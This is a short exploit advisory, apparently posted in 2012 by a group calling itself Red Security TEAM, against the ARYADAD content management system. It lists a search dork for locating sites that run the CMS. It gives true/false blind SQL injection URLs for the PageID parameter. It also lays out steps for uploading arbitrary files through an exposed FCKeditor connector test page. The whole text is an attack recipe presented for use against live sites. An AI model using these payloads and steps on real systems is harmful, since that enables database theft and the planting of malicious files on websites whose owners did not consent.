20 lines
No EOL
752 B
Text
20 lines
No EOL
752 B
Text
#
|
|
# Title : ARYADAD Multi Vulnerability
|
|
# Author : Red Security TEAM
|
|
# Date : 21/01/2012
|
|
# Vendor : http://cms.aryadad.com/
|
|
# Tested On : Windows Server 2008 (IIS 7.5)
|
|
# Dork : Powered by ARYADAD Corporation
|
|
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
|
|
# Home : http://RedSecurity.COM
|
|
#
|
|
# Exploit :
|
|
#
|
|
# I : Blind SQL Injection Vulnerability
|
|
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0
|
|
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0
|
|
#
|
|
# II : File Upload Vulnerability
|
|
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html
|
|
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
|
|
# |